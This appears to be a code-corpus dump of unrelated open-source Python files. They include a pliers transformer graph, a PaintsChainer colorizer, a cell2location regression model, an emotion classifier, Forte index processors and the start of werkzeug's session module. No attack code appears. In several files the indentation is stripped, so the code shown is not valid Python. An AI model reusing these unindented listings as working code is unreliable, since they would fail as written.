self.assertAllEqual(output_val[0, 1], output_val[1, 1])
if __name__ == "__main__":
tf.test.main()
|
pliers/graph.py | nickduran/pliers | 229 | 12739262 |
''' The `graph` module contains tools for constructing and executing graphs
of pliers Transformers. '''
from itertools import chain
from collections import OrderedDict
import json
from pliers.extractors.base import merge_results
from pliers.stimuli import __all__ as stim_list
from pliers.transformers import get_transformer
from pliers.utils import (listify, flatten, isgenerator, attempt_to_import,
verify_dependencies)
pgv = attempt_to_import('pygraphviz', 'pgv')
stim_list.insert(0, 'ExtractorResult')
class Node:
''' A graph node/vertex. Represents a single transformer, optionally with
references to children.
Args:
name (str): Name of the node
transformer (Transformer): the Transformer instance at this node
parameters (kwargs): parameters for initializing the Transformer
'''
def __init__(self, transformer, name=None, **parameters):
self.name = name
self.children = []
if isinstance(transformer, str):
transformer = get_transformer(transformer, **parameters)
self.transformer = transformer
self.parameters = parameters
if name is not None:
self.transformer.name = name
self.id = id(transformer)
def add_child(self, node):
''' Append a child to the list of children. '''
self.children.append(node)
def is_leaf(self):
return len(self.children) == 0
def to_json(self):
spec = {'transformer': self.transformer.__class__.__name__}
if self.name:
spec['name'] = self.name
if self.children:
children = []
for c in self.children:
children.append(c.to_json())
spec['children'] = children
if self.parameters:
spec['parameters'] = self.parameters
return spec
class Graph:
''' Graph-like structure that represents an entire pliers workflow.
Args:
nodes (list, dict): Optional nodes to add to the Graph at construction.
If a dict, must have a 'roots' key. If a list, each element must be
in one of the forms accepted by add_nodes().
spec (str): An optional path to a .json file containing the graph
specification.
'''
def __init__(self, nodes=None, spec=None):
self.nodes = OrderedDict()
self.roots = []
if nodes is not None:
if isinstance(nodes, dict):
nodes = nodes['roots']
self.add_nodes(nodes)
elif spec is not None:
with open(spec) as spec_file:
self.add_nodes(json.load(spec_file)['roots'])
@staticmethod
def _parse_node_args(node):
if isinstance(node, dict):
return node
kwargs = {}
if isinstance(node, (list, tuple)):
kwargs['transformer'] = node[0]
if len(node) > 1:
kwargs['children'] = node[1]
if len(node) > 2:
kwargs['name'] = node[2]
elif isinstance(node, Node):
kwargs['transformer'] = node.transformer
kwargs['children'] = node.children
kwargs['name'] = node.name
else:
kwargs['transformer'] = node
return kwargs
def add_nodes(self, nodes, parent=None, mode='horizontal'):
''' Adds one or more nodes to the current graph.
Args:
nodes (list): A list of nodes to add. Each element must be one of
the following:
* A dict containing keyword args to pass onto to the Node init.
* An iterable containing 1 - 3 elements. The first element is
mandatory, and specifies the Transformer at that node. The
second element (optional) is an iterable of child nodes
(specified in the same format). The third element
(optional) is a string giving the (unique) name of the
node.
* A Node instance.
* A Transformer instance.
parent (Node): Optional parent node (i.e., the node containing the
pliers Transformer from which the to-be-created nodes receive
their inputs).
mode (str): Indicates the direction with which to add the new nodes
* horizontal: the nodes should each be added as a child of the
'parent' argument (or a Graph root by default).
* vertical: the nodes should each be added in sequence with
                  the first node being the child of the 'parent' argument
(a Graph root by default) and each subsequent node being
the child of the previous node in the list.
'''
for n in nodes:
node_args = self._parse_node_args(n)
if mode == 'horizontal':
self.add_node(parent=parent, **node_args)
elif mode == 'vertical':
parent = self.add_node(parent=parent, return_node=True,
**node_args)
else:
raise ValueError("Invalid mode for adding nodes to a graph:"
"%s" % mode)
def add_chain(self, nodes, parent=None):
''' An alias for add_nodes with the mode preset to 'vertical'. '''
self.add_nodes(nodes, parent, 'vertical')
def add_children(self, nodes, parent=None):
''' An alias for add_nodes with the mode preset to 'horizontal'. '''
self.add_nodes(nodes, parent, 'horizontal')
def add_node(self, transformer, name=None, children=None, parent=None,
parameters={}, return_node=False):
''' Adds a node to the current graph.
Args:
transformer (str, Transformer): The pliers Transformer to use at
the to-be-added node. Either a case-insensitive string giving
the name of a Transformer class, or an initialized Transformer
instance.
name (str): Optional name to give this Node.
children (list): Optional list of child nodes (i.e., nodes to pass
the to-be-added node's Transformer output to).
parent (Node): Optional node from which the to-be-added Node
receives its input.
parameters (dict): Optional keyword arguments to pass onto the
Transformer initialized at this Node if a string is passed to
the 'transformer' argument. Ignored if an already-initialized
Transformer is passed.
return_node (bool): If True, returns the initialized Node instance.
Returns:
The initialized Node instance if return_node is True,
None otherwise.
'''
node = Node(transformer, name, **parameters)
self.nodes[node.id] = node
if parent is None:
self.roots.append(node)
else:
parent = self.nodes[parent.id]
parent.add_child(node)
if children is not None:
self.add_nodes(children, parent=node)
if return_node:
return node
def run(self, stim, merge=True, **merge_kwargs):
''' Executes the graph by calling all Transformers in sequence.
Args:
stim (str, Stim, list): One or more valid inputs to any
Transformer's 'transform' call.
merge (bool): If True, all results are merged into a single pandas
DataFrame before being returned. If False, a list of
ExtractorResult objects is returned (one per Extractor/Stim
combination).
merge_kwargs: Optional keyword arguments to pass onto the
merge_results() call.
'''
results = list(chain(*[self.run_node(n, stim) for n in self.roots]))
results = list(flatten(results))
self._results = results # For use in plotting
return merge_results(results, **merge_kwargs) if merge else results
transform = run
def run_node(self, node, stim):
''' Executes the Transformer at a specific node.
Args:
node (str, Node): If a string, the name of the Node in the current
Graph. Otherwise the Node instance to execute.
stim (str, stim, list): Any valid input to the Transformer stored
at the target node.
'''
if isinstance(node, str):
node = self.nodes[node]
result = node.transformer.transform(stim)
if node.is_leaf():
return listify(result)
stim = result
# If result is a generator, the first child will destroy the
# iterable, so cache via list conversion
if len(node.children) > 1 and isgenerator(stim):
stim = list(stim)
return list(chain(*[self.run_node(c, stim) for c in node.children]))
def draw(self, filename, color=True):
''' Render a plot of the graph via pygraphviz.
Args:
filename (str): Path to save the generated image to.
color (bool): If True, will color graph nodes based on their type,
otherwise will draw a black-and-white graph.
'''
verify_dependencies(['pgv'])
if not hasattr(self, '_results'):
raise RuntimeError("Graph cannot be drawn before it is executed. "
"Try calling run() first.")
g = pgv.AGraph(directed=True)
g.node_attr['colorscheme'] = 'set312'
for elem in self._results:
if not hasattr(elem, 'history'):
continue
log = elem.history
while log:
# Configure nodes
source_from = log.parent[6] if log.parent else ''
s_node = hash((source_from, log[2]))
s_color = stim_list.index(log[2])
s_color = s_color % 12 + 1
t_node = hash((log[6], log[7]))
t_style = 'filled,' if color else ''
t_style += 'dotted' if log.implicit else ''
if log[6].endswith('Extractor'):
t_color = '#0082c8'
elif log[6].endswith('Filter'):
t_color = '#e6194b'
else:
t_color = '#3cb44b'
r_node = hash((log[6], log[5]))
r_color = stim_list.index(log[5])
r_color = r_color % 12 + 1
# Add nodes
if color:
g.add_node(s_node, label=log[2], shape='ellipse',
style='filled', fillcolor=s_color)
g.add_node(t_node, label=log[6], shape='box',
style=t_style, fillcolor=t_color)
g.add_node(r_node, label=log[5], shape='ellipse',
style='filled', fillcolor=r_color)
else:
g.add_node(s_node, label=log[2], shape='ellipse')
g.add_node(t_node, label=log[6], shape='box',
style=t_style)
g.add_node(r_node, label=log[5], shape='ellipse')
# Add edges
g.add_edge(s_node, t_node, style=t_style)
g.add_edge(t_node, r_node, style=t_style)
log = log.parent
g.draw(filename, prog='dot')
def to_json(self):
''' Returns the JSON representation of this graph. '''
roots = []
for r in self.roots:
roots.append(r.to_json())
return {'roots': roots}
def save(self, filename):
''' Writes the JSON representation of this graph to the provided
filename, such that the graph can be easily reconstructed using
Graph(spec=filename).
Args:
filename (str): Path at which to write out the json file.
'''
with open(filename, 'w') as outfile:
json.dump(self.to_json(), outfile)
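# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module). A minimal, hedged
# example of building and running a Graph; the extractor name is only
# illustrative and depends on which optional pliers dependencies are installed:
#
#   from pliers.graph import Graph
#   g = Graph()
#   g.add_chain(['VADERSentimentExtractor'])
#   df = g.run(['What a wonderful day!'])   # merged pandas DataFrame
#   g.save('my_graph.json')                 # reload later with Graph(spec=...)
# ---------------------------------------------------------------------------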
|
scripts/read-target.py | wushukai/NetBricks | 450 | 12739286 | #!/usr/bin/env python3
"""
Take the JSON description of a crate manifest (e.g. the output of `cargo read-manifest`) and print the binary target names.
"""
import sys
import json
def main(inp):
    try:
        o = json.loads(inp)
    except ValueError:
        print("Failed to interpret JSON", file=sys.stderr)
        sys.exit(1)
    if 'targets' in o:
        for target in o['targets']:
            if 'kind' in target and (target['kind'] == 'bin' or 'bin' in target['kind']):
                print(target['name'])
    else:
        print("No targets found")
if __name__=="__main__":
if len(sys.argv) < 2:
print("Usage: %s json"%sys.argv[0], file=sys.stderr)
sys.exit(1)
if len(sys.argv) == 2 and sys.argv[1] == '-':
inp = sys.stdin.read()
main(inp)
else:
main(' '.join(sys.argv[1:]))
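# Editor's note: an assumed invocation, piping the crate's JSON manifest
# description into this script:
#   cargo read-manifest --manifest-path Cargo.toml | ./read-target.py -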
|
maths/Find_Min.py | ELR424/Python | 1,568 | 12739294 | def main():
def findMin(x):
minNum = x[0]
for i in x:
if minNum > i:
minNum = i
return minNum
print(findMin([0,1,2,3,4,5,-3,24,-56])) # = -56
if __name__ == '__main__':
main()
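# Editor's note: the built-in gives the same result, e.g.
#   min([0, 1, 2, 3, 4, 5, -3, 24, -56])  # -56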
|
cgi-bin/paint_x2_unet/cgi_exe.py | Schenng/color-wave-ml-training | 2,990 | 12739317 | #!/usr/bin/env python
import numpy as np
import chainer
from chainer import cuda, serializers, Variable # , optimizers, training
import cv2
import os.path
#import chainer.functions as F
#import chainer.links as L
#import six
#import os
#from chainer.training import extensions
#from train import Image2ImageDataset
from img2imgDataset import ImageAndRefDataset
import unet
import lnet
class Painter:
def __init__(self, gpu=0):
print("start")
self.root = "./images/"
self.batchsize = 1
self.outdir = self.root + "out/"
self.outdir_min = self.root + "out_min/"
self.gpu = gpu
self._dtype = np.float32
if not os.path.isfile("./models/unet_128_standard"):
print("./models/unet_128_standard not found. Please download them from http://paintschainer.preferred.tech/downloads/")
if not os.path.isfile("./models/unet_512_standard"):
print("./models/unet_512_standard not found. Please download them from http://paintschainer.preferred.tech/downloads/")
print("load model")
if self.gpu >= 0:
cuda.get_device(self.gpu).use()
cuda.set_max_workspace_size(64 * 1024 * 1024) # 64MB
chainer.Function.type_check_enable = False
self.cnn_128 = unet.UNET()
self.cnn_512 = unet.UNET()
if self.gpu >= 0:
self.cnn_128.to_gpu()
self.cnn_512.to_gpu()
#lnn = lnet.LNET()
#serializers.load_npz("./cgi-bin/wnet/models/model_cnn_128_df_4", cnn_128)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_cnn_128_f3_2", cnn_128)
serializers.load_npz(
"./models/unet_128_standard", self.cnn_128)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_cnn_128_ua_1", self.cnn_128)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_m_1.6", self.cnn)
serializers.load_npz(
"./models/unet_512_standard", self.cnn_512)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_p2_1", self.cnn)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_10000", self.cnn)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/liner_f", lnn)
def save_as_img(self, array, name):
array = array.transpose(1, 2, 0)
array = array.clip(0, 255).astype(np.uint8)
array = cuda.to_cpu(array)
(major, minor, _) = cv2.__version__.split(".")
if major == '3':
img = cv2.cvtColor(array, cv2.COLOR_YUV2RGB)
else:
img = cv2.cvtColor(array, cv2.COLOR_YUV2BGR)
cv2.imwrite(name, img)
    def liner(self, id_str):
        if self.gpu >= 0:
            cuda.get_device(self.gpu).use()
        # `path1` was undefined in the original source; the input sketch is
        # assumed to live alongside the other line images (hypothetical path).
        path1 = self.root + "line/" + id_str + ".png"
        image1 = cv2.imread(path1, cv2.IMREAD_GRAYSCALE)
image1 = np.asarray(image1, self._dtype)
if image1.ndim == 2:
image1 = image1[:, :, np.newaxis]
img = image1.transpose(2, 0, 1)
x = np.zeros((1, 3, img.shape[1], img.shape[2]), dtype='f')
if self.gpu >= 0:
x = cuda.to_gpu(x)
lnn = lnet.LNET()
with chainer.no_backprop_mode():
with chainer.using_config('train', False):
y = lnn.calc(Variable(x))
self.save_as_img(y.data[0], self.root + "line/" + id_str + ".jpg")
def colorize(self, id_str, step='C', blur=0, s_size=128,colorize_format="jpg"):
if self.gpu >= 0:
cuda.get_device(self.gpu).use()
_ = {'S': "ref/", 'L': "out_min/", 'C': "ref/"}
dataset = ImageAndRefDataset(
[id_str + ".png"], self.root + "line/", self.root + _[step])
_ = {'S': True, 'L': False, 'C': True}
sample = dataset.get_example(0, minimize=_[step], blur=blur, s_size=s_size)
_ = {'S': 0, 'L': 1, 'C': 0}[step]
sample_container = np.zeros(
(1, 4, sample[_].shape[1], sample[_].shape[2]), dtype='f')
sample_container[0, :] = sample[_]
if self.gpu >= 0:
sample_container = cuda.to_gpu(sample_container)
cnn = {'S': self.cnn_128, 'L': self.cnn_512, 'C': self.cnn_128}
with chainer.no_backprop_mode():
with chainer.using_config('train', False):
image_conv2d_layer = cnn[step].calc(Variable(sample_container))
del sample_container
if step == 'C':
input_bat = np.zeros((1, 4, sample[1].shape[1], sample[1].shape[2]), dtype='f')
print(input_bat.shape)
input_bat[0, 0, :] = sample[1]
output = cuda.to_cpu(image_conv2d_layer.data[0])
del image_conv2d_layer # release memory
for channel in range(3):
input_bat[0, 1 + channel, :] = cv2.resize(
output[channel, :],
(sample[1].shape[2], sample[1].shape[1]),
interpolation=cv2.INTER_CUBIC)
if self.gpu >= 0:
link = cuda.to_gpu(input_bat, None)
else:
link = input_bat
with chainer.no_backprop_mode():
with chainer.using_config('train', False):
image_conv2d_layer = self.cnn_512.calc(Variable(link))
del link # release memory
image_out_path = {
'S': self.outdir_min + id_str + ".png",
'L': self.outdir + id_str + ".jpg",
'C': self.outdir + id_str + "_0." + colorize_format}
self.save_as_img(image_conv2d_layer.data[0], image_out_path[step])
del image_conv2d_layer
if __name__ == '__main__':
for n in range(1):
p = Painter()
print(n)
p.colorize(n * p.batchsize)
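# ---------------------------------------------------------------------------
# Editor's note (assumed layout): Painter expects pretrained weights under
# ./models/ and an ./images/ tree with the sub-directories used above --
# line/ (input sketches), ref/ (colour hints), out/ and out_min/ (results).
# A hedged standalone run might look like:
#   p = Painter(gpu=-1)         # CPU-only; pass gpu=0 to use the first GPU
#   p.colorize("example_id")    # reads images/line/example_id.png and ref/
# ---------------------------------------------------------------------------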
|
cell2location/models/base/regression_torch_model.py | nadavyayon/cell2location | 127 | 12739330 |
# -*- coding: utf-8 -*-
"""RegressionTorchModel Base class for model with no cell specific parameters"""
import matplotlib.pyplot as plt
# +
import numpy as np
import pandas as pd
from cell2location.models.base.torch_model import TorchModel
class RegressionTorchModel(TorchModel):
r"""Base class for regression models with no cell-specific parameters (enable minibatch training).
:param sample_id: str with column name in cell2covar that denotes sample
:param cell2covar: pd.DataFrame with covariates in columns and cells in rows, rows should be named.
:param X_data: Numpy array of gene expression (cols) in cells (rows)
:param n_iter: number of iterations, when using minibatch, the number of epochs (passes through all data),
supersedes self.n_iter
:param (data_type, learning_rate, total_grad_norm_constraint, verbose, var_names, var_names_read, obs_names, fact_names):
arguments for parent class :func:`~cell2location.models.BaseModel`
:param minibatch_size: if None all data is used for training,
if not None - the number of cells / observations per batch. For best results use 1024 cells per batch.
    :param minibatch_seed: order of cells in minibatch is chosen randomly, so a seed for each training restart
should be provided
:param prior_eps: numerical stability constant added to initial values
:param nb_param_conversion_eps: NB distribution numerical stability constant, see :func:`~cell2location.models.TorchModel.nb_log_prob`
:param use_cuda: boolean, telling pytorch to use the GPU (if true).
:param use_average_as_initial_value: boolean, use average gene expression for each categorical covariate as initial value?
:param stratify_cv: when using cross-validation on cells (selected in the training method), this is a pd.Series that
tells :func:`~sklearn.model_selection.train_test_split` how to stratify when creating a split.
"""
def __init__(
self,
sample_id,
cell2covar: pd.DataFrame,
X_data: np.ndarray,
data_type="float32",
n_iter=200000,
learning_rate=0.001,
total_grad_norm_constraint=200,
verbose=True,
var_names=None,
var_names_read=None,
obs_names=None,
fact_names=None,
minibatch_size=None,
minibatch_seed=[41, 56, 345],
prior_eps=1e-8,
nb_param_conversion_eps=1e-8,
use_cuda=False,
use_average_as_initial_value=True,
stratify_cv=None,
):
############# Initialise parameters ################
# convert covariates to binary matrix
        # test for column types, get dummies for categorical / character, and just copy over continuous
cell2covar_df = pd.get_dummies(cell2covar.loc[:, ~cell2covar.columns.isin([sample_id])])
cell2sample_df = pd.get_dummies(cell2covar[[sample_id]])
cell2sample_covar_df = pd.concat([cell2sample_df, cell2covar_df], axis=1)
fact_names = cell2sample_covar_df.columns
n_fact = cell2sample_covar_df.shape[1]
# extract obs names and sample id
obs_names = cell2covar.index
sample_id = cell2covar[sample_id]
super().__init__(
X_data,
n_fact,
data_type,
n_iter,
learning_rate,
total_grad_norm_constraint,
verbose,
var_names,
var_names_read,
obs_names,
fact_names,
sample_id,
use_cuda,
)
self.nb_param_conversion_eps = nb_param_conversion_eps
self.cell_factors_df = None
self.minibatch_size = minibatch_size
self.minibatch_seed = minibatch_seed
self.n_cells_total = self.n_obs
self.which_sample = self.fact_names.isin(cell2sample_df.columns)
self.n_samples = np.sum(self.which_sample)
self.n_covar = self.n_fact - self.n_samples
self.prior_eps = prior_eps
self.cell2sample_df = cell2sample_df
self.cell2sample_covar_df = cell2sample_covar_df
# convert to np.ndarray
self.cell2sample_mat = cell2sample_df.values
self.cell2sample_covar_mat = cell2sample_covar_df.values
# find mean and variance for each gene
self.gene_mean = (self.X_data + self.prior_eps).mean(0).astype(self.data_type).reshape((1, self.n_var))
self.noise_gene_mean = (self.gene_mean / 10).astype(self.data_type).reshape((1, self.n_var))
self.prior_gene_mean = np.concatenate([self.noise_gene_mean, self.gene_mean], axis=0)
self.stratify_cv = stratify_cv
self.extra_data["cell2sample_covar"] = self.cell2sample_covar_mat
if use_average_as_initial_value:
# compute initial value for parameters: cluster averages
self.cell2sample_covar_sig_mat = self.cell2sample_covar_mat / self.cell2sample_covar_mat.sum(0)
self.clust_average_mat = np.dot(self.cell2sample_covar_sig_mat.T, self.X_data) + self.prior_eps
self.clust_average_mat[self.which_sample, :] = self.clust_average_mat[self.which_sample, :] / 10
# aver = get_cluster_averages(adata_snrna_raw, 'annotation_1') + self.prior_eps
# variances = get_cluster_variances(adata_snrna_raw, 'annotation_1') + self.prior_eps
# shape = aver ** 2 / variances
# shape = shape.mean(1).values
# overdisp_mean = shape.reshape((1, adata_snrna_raw.shape[1]))
self.gene_E_mat = None # np.sqrt(1 / overdisp_mean) # get gene_E ~ Exponential()
else:
self.clust_average_mat = None
self.gene_E_mat = None
# =====================Other functions======================= #
def plot_gene_budget(self):
plt.hist(np.log10(self.samples["post_sample_means"]["gene_level"][:, 0]), bins=50)
plt.xlabel("Gene expression level (hierarchical)")
plt.title("Gene expression level (hierarchical)")
plt.tight_layout()
def sample2df(self, gene_node_name="gene_factors", sample_type="means"):
r"""Export cell factors as Pandas data frames.
:param node_name: name of the cell factor model parameter to be exported
:param gene_node_name: name of the gene factor model parameter to be exported
:param sample_type: type of posterior sample (means, q05, q95, sds)
:return: 8 Pandas dataframes added to model object:
.covariate_effects, .covariate_effects_sd, .covariate_effects_q05, .covariate_effects_q95
.sample_effects, .sample_effects_sd, .sample_effects_q05, .sample_effects_q95
"""
# export parameters for covariate effects
cov_ind = ~self.which_sample
self.covariate_effects = pd.DataFrame.from_records(
self.samples["post_sample_" + sample_type][gene_node_name][cov_ind, :].T,
index=self.var_names,
columns=[sample_type + "_cov_effect_" + i for i in self.fact_names[cov_ind]],
)
# export parameters for sample effects
sample_ind = self.which_sample
self.sample_effects = pd.DataFrame.from_records(
self.samples["post_sample_" + sample_type][gene_node_name][sample_ind, :].T,
index=self.var_names,
columns=[sample_type + "_sample_effect" + i for i in self.fact_names[sample_ind]],
)
def annotate_cell_adata(self, adata, use_raw=True):
r"""Add covariate and sample coefficients to anndata.var
:param adata: anndata object to annotate
:return: updated anndata object
"""
if self.cell_factors_df is None:
self.sample2df()
if use_raw is True:
var_index = adata.raw.var.index
### Covariate effect
# add gene factors to adata
adata.raw.var[self.covariate_effects.columns] = self.covariate_effects.loc[var_index, :]
### Sample effects
# add gene factors to adata
adata.raw.var[self.sample_effects.columns] = self.sample_effects.loc[var_index, :]
else:
var_index = adata.var.index
### Covariate effect
# add gene factors to adata
adata.var[self.covariate_effects.columns] = self.covariate_effects.loc[var_index, :]
### Sample effects
# add gene factors to adata
adata.var[self.sample_effects.columns] = self.sample_effects.loc[var_index, :]
return adata
|
emotion.py | hyungkwonko/FacePose_pytorch | 499 | 12739385 | import cv2
import torch
from torchvision import transforms
import math
import numpy as np
import torchvision.models as models
import torch.utils.data as data
import torch.nn.functional as F
from torch.autograd import Variable
import pandas as pd
import os
import torch.nn as nn
import time
import argparse
result = ["Surprise","Fear","Disgust","Happiness","Sadness","Anger","Neutral"]
class Res18Feature(nn.Module):
def __init__(self, pretrained, num_classes = 7):
super(Res18Feature, self).__init__()
resnet = models.resnet18(pretrained)
self.features = nn.Sequential(*list(resnet.children())[:-1])
fc_in_dim = list(resnet.children())[-1].in_features
self.fc = nn.Linear(fc_in_dim, num_classes)
self.alpha = nn.Sequential(nn.Linear(fc_in_dim, 1),nn.Sigmoid())
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
attention_weights = self.alpha(x)
out = attention_weights * self.fc(x)
return attention_weights, out
model_save_path = "./checkpoint/wiki2020.pth"  # model path
def main(args):
preprocess_transform = transforms.Compose([transforms.ToPILImage(),transforms.Resize((224, 224)),transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])])
res18 = Res18Feature(pretrained = False)
checkpoint = torch.load(model_save_path)
res18.load_state_dict(checkpoint['model_state_dict'])
res18.cuda()
res18.eval()
for i in [0]:
time1=time.time()
image = cv2.imread(args.img)
image = image[:, :, ::-1]
image_tensor = preprocess_transform(image)
tensor = Variable(torch.unsqueeze(image_tensor, dim=0).float(), requires_grad=False)
tensor=tensor.cuda()
time2=time.time()
_, outputs = res18(tensor)
_, predicts = torch.max(outputs, 1)
print(result[int(predicts.cpu().data)])
def parse_args():
parser = argparse.ArgumentParser(description='Testing')
parser.add_argument('--img',default="./img/suripse.jpg",type=str)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_args()
main(args)
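# Editor's note: assumed invocation (requires a CUDA-capable GPU and the
# weights at ./checkpoint/wiki2020.pth; the image path is just an example):
#   python emotion.py --img ./img/some_face.jpg
# Prints one of: Surprise, Fear, Disgust, Happiness, Sadness, Anger, Neutral.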
|
homemade/utils/features/normalize.py | gvvynplaine/homemade-machine-learning | 19,413 | 12739386 |
"""Normalize features"""
import numpy as np
def normalize(features):
"""Normalize features.
Normalizes input features X. Returns a normalized version of X where the mean value of
each feature is 0 and deviation is close to 1.
:param features: set of features.
:return: normalized set of features.
"""
# Copy original array to prevent it from changes.
features_normalized = np.copy(features).astype(float)
# Get average values for each feature (column) in X.
features_mean = np.mean(features, 0)
# Calculate the standard deviation for each feature.
features_deviation = np.std(features, 0)
# Subtract mean values from each feature (column) of every example (row)
# to make all features be spread around zero.
if features.shape[0] > 1:
features_normalized -= features_mean
# Normalize each feature values so that all features are close to [-1:1] boundaries.
# Also prevent division by zero error.
features_deviation[features_deviation == 0] = 1
features_normalized /= features_deviation
return features_normalized, features_mean, features_deviation
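if __name__ == '__main__':
    # Editor's sketch (not part of the original module): each normalized
    # column should end up with zero mean and roughly unit deviation.
    demo_features = np.array([[1.0, 200.0], [2.0, 300.0], [3.0, 400.0]])
    demo_normalized, demo_mean, demo_deviation = normalize(demo_features)
    print(demo_normalized.mean(axis=0))  # ~[0. 0.]
    print(demo_mean)                     # [  2. 300.]
    print(demo_deviation)                # column-wise standard deviations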
|
forte/processors/base/index_processor.py | J007X/forte | 163 | 12739394 |
# Copyright 2020 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Index processor
"""
from abc import ABC
from typing import Dict, Any, List, Tuple
from forte.common import Resources
from forte.common.configuration import Config
from forte.data.data_pack import DataPack
from forte.processors.base.pack_processor import PackProcessor
__all__ = ["IndexProcessor", "IndexProcessorWithDatapack"]
class IndexProcessor(PackProcessor, ABC):
r"""A base processor for indexing documents into traditional indexers like
Elasticsearch and/or dense vector indexers like Faiss. Subclasses need to
implement :meth:`IndexProcessor::_bulk_process`.
"""
# pylint: disable=useless-super-delegation
def __init__(self) -> None:
super().__init__()
self.documents: List[Dict[str, str]] = []
@classmethod
def default_configs(cls) -> Dict[str, Any]:
return {"batch_size": 128}
def _bulk_process(self):
r"""Subclasses of :class:`IndexProcessor` should implement this method
to bulk add the documents into the index.
"""
raise NotImplementedError
def _field_names(self) -> List[str]:
r"""Subclasses of :class:`IndexProcessor` should implement this method
to provide the field name for indexing.
The return value from :func:`_content_for_index` will be added into
these fields. The length of the return value of this function should
be the same as the return value for :func:`_content_for_index`.
Returns:
"""
raise NotImplementedError
def _content_for_index(self, input_pack: DataPack) -> List[str]:
raise NotImplementedError
def _process(self, input_pack: DataPack):
# self.documents.append((str(input_pack.pack_id), input_pack.text))
index_pairs: Dict[str, str] = dict(
zip(self._field_names(), self._content_for_index(input_pack))
)
self.documents.append(index_pairs)
if len(self.documents) == self.configs.batch_size:
self._bulk_process()
self.documents = []
def flush(self):
if len(self.documents) > 0:
self._bulk_process()
class IndexProcessorWithDatapack(PackProcessor, ABC):
r"""A base processor for indexing a document with its original datapack
into traditional indexers like Elasticsearch.
Subclasses need to implement
:meth:`IndexProcessorWithDatapack::_bulk_process`.
"""
# pylint: disable=useless-super-delegation
def __init__(self) -> None:
super().__init__()
self.documents: List[Tuple[str, str, str]] = []
# pylint: disable=attribute-defined-outside-init
def initialize(self, resources: Resources, configs: Config):
self.resources = resources
self.config = configs
@classmethod
def default_configs(cls) -> Dict[str, Any]:
config = super().default_configs()
config.update({"batch_size": 128})
return config
def _bulk_process(self):
r"""Subclasses of :class:`IndexProcessorWithDatapack`
should implement this method
to bulk add the documents into the index.
"""
raise NotImplementedError
def _process(self, input_pack: DataPack):
serialized_datapack: str = input_pack.to_string()
self.documents.append(
(str(input_pack.pack_id), input_pack.text, serialized_datapack)
)
if len(self.documents) == self.config.batch_size:
self._bulk_process()
self.documents = []
def flush(self):
if len(self.documents) > 0:
self._bulk_process()
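# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module). A hedged outline of
# a concrete subclass; `MyIndexClient` and its `bulk_add` method are
# hypothetical stand-ins for a real indexer backend:
#
#   class MyIndexProcessor(IndexProcessor):
#       def _field_names(self):
#           return ["doc_id", "content"]
#       def _content_for_index(self, input_pack):
#           return [str(input_pack.pack_id), input_pack.text]
#       def _bulk_process(self):
#           # self.documents is a list of {field_name: value} dicts
#           MyIndexClient().bulk_add(self.documents)
# ---------------------------------------------------------------------------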
|
virtual/lib/python3.6/site-packages/werkzeug/contrib/sessions.py | kenmutuma001/Blog | 384 | 12739418 | # -*- coding: utf-8 -*-
r"""
werkzeug.contrib.sessions
~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains some helper classes that help one to add session
support to a python WSGI application. For full client-side session
storage see :mod:`~werkzeug.contrib.securecookie` which implements a
secure, client-side session storage.
Application Integration
=======================
::
from werkzeug.contrib.sessions import SessionMiddleware, \
FilesystemSessionStore
app = SessionMiddleware(app, FilesystemSessionStore())
The current session will then appear in the WSGI environment as
`werkzeug.session`. However it's recommended to not use the middleware
but the stores directly in the application. However for very simple
scripts a middleware for sessions could be sufficient.
This module does not implement methods or ways to check if a session is
    expired. That should be done by a cronjob and is storage specific. For
example to prune unused filesystem sessions one could check the modified
time of the files. If sessions are stored in the database the new()
method should add an expiration timestamp for the session.
For better flexibility it's recommended to not use the middleware but the
store and session object directly in the application dispatching::
session_store = FilesystemSessionStore()
def application(environ, start_response):
request = Request(environ)
sid = request.cookies.get('cookie_name')
if sid is None:
request.session = session_store.new()
else:
request.session = session_store.get(sid)
response = get_the_response_object(request)
if request.session.should_save:
session_store.save(request.session)
response.set_cookie('cookie_name', request.session.sid)
return response(environ, start_response)
:copyright: 2007 Pallets
:license: BSD-3-Clause
"""
import os
import re
import tempfile
import warnings
from hashlib import sha1
from os import path
from pickle import dump
from pickle import HIGHEST_PROTOCOL
from pickle import load
from random import random
from time import time
from .._compat import PY2
from .._compat import text_type
from ..datastructures import CallbackDict
from ..filesystem import get_filesystem_encoding
from ..posixemulation import rename
from ..utils import dump_cookie
from ..utils import parse_cookie
from ..wsgi import ClosingIterator
warnings.warn(
"'werkzeug.contrib.sessions' is deprecated as of version 0.15 and"
" will be removed in version 1.0. It has moved to"
" https://github.com/pallets/secure-cookie.",
DeprecationWarning,
stacklevel=2,
)
_sha1_re = re.compile(r"^[a-f0-9]{40}$")
def _urandom():
if hasattr(os, "urandom"):
return os.urandom(30)
return text_type(random()).encode("ascii")
def generate_key(salt=None):
if salt is None:
salt = repr(salt).encode("ascii")
return sha1(b"".join([salt, str(time()).encode("ascii"), _urandom()])).hexdigest()
class ModificationTrackingDict(CallbackDict):
__slots__ = ("modified",)
def __init__(self, *args, **kwargs):
def on_update(self):
self.modified = True
self.modified = False
CallbackDict.__init__(self, on_update=on_update)
dict.update(self, *args, **kwargs)
def copy(self):
"""Create a flat copy of the dict."""
missing = object()
result = object.__new__(self.__class__)
for name in self.__slots__:
val = getattr(self, name, missing)
if val is not missing:
setattr(result, name, val)
return result
def __copy__(self):
return self.copy()
class Session(ModificationTrackingDict):
"""Subclass of a dict that keeps track of direct object changes. Changes
